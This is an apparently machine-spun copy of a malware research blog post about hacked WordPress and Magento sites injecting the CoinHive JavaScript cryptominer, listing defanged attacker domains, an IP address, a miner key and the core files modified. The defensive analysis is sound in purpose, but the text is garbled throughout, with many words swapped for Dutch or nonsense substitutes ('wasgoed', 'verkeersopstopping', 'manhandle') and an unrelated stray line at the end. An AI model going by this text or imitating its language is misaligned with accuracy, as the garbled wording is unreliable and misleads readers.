Hacked Websites Mine Cryptocurrencies

Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICO, mining farms, skyrocketing exchange rates – you see or hear this every day ter the news now. Everyone seems to be attempting to leap on this bandwagon.

This trend resulted ter the emergence of online platforms that permit webmasters to install coin miners into their websites spil an alternative means of monetization. The most notable platforms that provide JavaScript cryptocurrency miners for websites are JSE Coin and Coinhive.

Controversy Around JavaScript Miners

Both of thesis platforms permit webmasters to register and obtain a snippet of JavaScript code that they can install on their sites. This code will work ter the background of visitors’ browsers, mining coins by utilizing excess CPU power of their rekentuig.

Ter this blog postbode wij will not discuss whether it’s a good alternative for banner ads, strafgevangenis whether your rekentuig has “excess CPU power” that permits websites you visit to drain – this is what happens when you visit a webpagina with CoinHive JavaScript Miner.

Visitor’s laptop CPU flow

For example, many visitors of PirateBay instantly noticed that it began testing such an online miner. It’s a no-brainer that ad blockers will soon start blocking JavaScript miners too.

Like with any other type of webstek monetization, this one is prone to manhandle, especially ter its early stages. It didn’t take long for us to encounter the CoinHive miner installed on hacked sites. It’s a natural budge for bad actors who similarly manhandle other legitimate means of webstek monetization, for example, installing their own ad or affiliate codes to third-party sites.

Malicious Injection with CoinHive Miner

Te this case, a websitebeheerder contacted us and said that some of their webpagina visitors noticed high processor flow while visiting the webpagina. Some of them even identified the CoinHive cryptominer there. Indeed, the HTML code of web pages contained this code te the footer section:

That security.fblaster[.]com script loaded the CoinHive Miner script

CoinHive miner on security.fblaster[.]com It’s not the official way to use the CoinHive Miner (which is supposed to be loaded from lib/coinhive.zoogmoeder.js on their own webpagina) but if you check the very first long line of the “security.fblaster[.]com” script you’ll see that it’s identical to the CoinHive’s own coinhive.minus.js. The surplus of the lines are the part that initializes the miner using the site’s unique key and starts it on pagina blast.

Security.fblaster[.]com Malware

Wij searched for security.fblaster[.]com and found very similar injections on a few other sites.

  • hxxp://security.fblaster[.]com/sidebar.js?id=1
  • hxxp://security.fblaster[.]com/slider.js?id=1
  • hxxp://security.fblaster[.]com/widgets.js?id=1

The names of the scripts are made to show up legitimate so that the websitebeheerder doesn’t get alarmed when watching them. Moreover, a duo of sites wij investigated referenced the domain names of the infected sites within the malicious script – making them look even more spil if they belong on the sites.

Those scripts have bot already eliminated from most of the infected sites, but one webpagina still had that live script and it loaded the same crypto-miner with another webpagina key: XMzUIs3Jx7qkRuPPfxG4I5k4AdXfQV6D.

Cryptominer Re-uses Old Infection

Wij checked the infected sites on the Wayback Machine and tracked down that injection to the end of 2016. Wij also noticed that the IP address of the “security.fblaster[.]com” server (178.62.224.14 – Digitalocean Mokum) wasgoed mentioned te a tweet about an attacks that attempted to exploit RevSlider vulnerability:

#RevSlider #soaksoak #malware attempts from 178.62.224.14 (NL) ../wp-config.php

That wasgoed strange considering CoinHive didn’t even exist back then. According to WHOIS, coin-hive.com (the domain that is hard-coded inwards the JavaScript miner) wasgoed registered just a month ago on August 24th, 2018.

Moreover, on the webpagina whose websitebeheerder contacted us, the script wasgoed only injected on September 19th, 2018 (which wasgoed confirmed by Google cache). Wij also noticed that the script had a long number te the ?id= parameter that switched on every pagina geyser, while te scripts on other sites it wasgoed always ?id=1.

It shows up spil if this is not a fresh infection, but since the attackers already control the “security.fblaster[.]com” server, they can lightly modify the malicious script without having to switch anything on sites that they had infected previously.

Once the hackers learned about CoinHive, they registered for the service (it only asks for a valid email address) and ported their JavaScript Miner to work off of their own domain – effectively re-using the scripts they already injected to compromised sites.

Since the cryptocurrency miner only produces meaningful results on sites with lots of visitors (or on a large number of less popular sites), they began to inject the miner to fresh sites just a few days ago. At this point the security.fblaster[.]com infection is not massive (albeit there are other similar attacks spil you’ll read below) spil wij don’t see it on many other sites so very likely the attackers are still testing this treatment.

Infected Files on WordPress

Now let’s see how this infection works on the server. A quick scan exposed modified core WordPress files.

The very first modification wasgoed discovered at the top of the wp-admin/admin-header.php

This line of code sets the wpt cookie for 100 years (!) for WordPress users who loom into the Admin interface.

The next opstopping is wp-includes/general-template.php with a modified wp_footer() function.

This function is responsible for generating the footer section of web pages. Hackers added functionality by calling code from wp-includes/options-footer.php – which, by the way, is not a legitimate part of WordPress.

Let’s take a look inwards the malicious options-footer.php verkeersopstopping.

Source code of options-footer.php

Spil you can see, this verkeersopstopping injects the security.fblaster[.]com script (CoinHive Miner), into the footer of web pages, effectively manhandling all visitors who are not known spil the webpagina users (don’t have the wpt cookie).

This code also provides us with the response why wij spotted a long number ter the ?id= parameter of the injected script, and why it switched on every pagina stream. It turns out it’s just a timestamp generated by the time() function.

Injected CoinHive Miner on Magento

By the time wij finished cleaning this webpagina, my colleague Douglas Santos, who worked on a different webpagina, found another type of injected cryptominer script. It wasgoed the same CoinHive JavaScript miner but the code wasgoed injected into database of the Magento webpagina (vormgeving/head/includes ter the core_config_data table).

The injected remote script wasgoed different:

CoinHive miner ter Magento Database

The source of the script – hxxps://camillesanz[.]com/lib/status.js – is also a version of the CoinHive’s own coinhive.minus.js – but this time it’s encrypted and looks like this:

Encrypted CoinHive miner inwards status.js

Te this case, the attacker determined to host the script on a hacked third-party webpagina and went an reserve mile to encrypt the script which suggests far more serious intentions for this attack than te the case of security.fblaster[.]com.

The database injection, ter this case, coexists along with an older massive Magento infection that injected redirect scripts like:

  • hxxps://africangrey[.]top/redirect_base/redirect.js
  • hxxp://alemoney[.]xyz/js/stat.js
  • hxxp://africangirl[.]top/redirect_base/redirect.js
  • hxxp://ribinski[.]us/redirect_base/redirect.js
  • hxxps://aleinvest[.]xyz/js/theme.js.

It Escalated Quickly

The next morning wij received this email:

Themes, Plugins are exploiting to mine monero coin and sucking lotsbestemming of CPU.

By hand Cleaned 20+ Sites today.

Wij are still waiting for details on this case so stay tuned for the updates.

Conclusion

One thing is clear – the release of JavaScript coin miners for websites wasgoed not unnoticed by the bad guys. They instantaneously began looking for ways to manhandle it, and wij expect to see mass infections switching their attention to crypto-miners instead of traditional types of malicious payloads, and not just on WordPress and Magento.

While the cryptocurrency miners for websites is a very fresh thing, there is nothing fresh ter approaches that hackers use to manhandle it. If something can be installed on a web webpagina and monetized, hackers will do it on websites they compromise. Thus one of the best security practices for webmasters is to monitor integrity of their sites.

For WordPress infections like this, you can use our step-by-step guide on how to identify hack and clean a compromised WordPress webpagina. Wij also have a similar guide that will help owners of Magento sites.

If you need instantaneous help with this type of infection, wij suggest affordable webstek security plans.

About Denis Sinegubko

Denis is the founder of Unmask Parasites and a Senior Malware Researcher at Sucuri. Go after him on Twitter at @unmaskparasites.

Reader Interactions

Comments

Thats’s Good, I am glad that you identified the exploit the precies opstopping, that they are using, Protecting with 400 permission will do the job for now. But I think Some Plugin Author using to earn some revenue from it by injecting them ter their plugin update. I have found some of those, tho’ I don’t wanna disclose them publicly. WordPress Should bring some #Hotfix again to prevent this Core Opstopping #Expolit. Its messy when you have to substitute the core verkeersopstopping again and again.

I wish there could be a good way to use this technology: it has the potential to give websites some revenue without float everything with ads and popups. Imagine an internet practice without ads? ..that would be something!

I think that users should be able to choose if they want to have ads all overheen the place or, instead, give some CPU usage while they are loving a webstek’s content.

That is more expensive for users, just imagine what it would be like for mobile, tablet, and laptop users whose devices use batteries for power. Even desktop users would see more fever, noise, and higher electrified bills.

Javascript miners don’t have to run at 100%, it’s up to the dev to set it. Anyway, the options could be left te the arms of the end users, maybe even at a browser level (or with browser plugins like ad-blocker): block ads and let some resource on js miners or vice-versa.

Content creators websites need some income, one way or the other. The lack of it will cause the continuous decline te quantity and quality of their content. Users should be able to choose what is less intrusive for them.

Primary Sidebar

Socialize With Sucuri

Wij’re actively engaged across numerous platforms. Go after us and let’s connect!

Related movie: WORX Landroid Robotic Mower | Two Month Review


Leave a Reply

Your email address will not be published. Required fields are marked *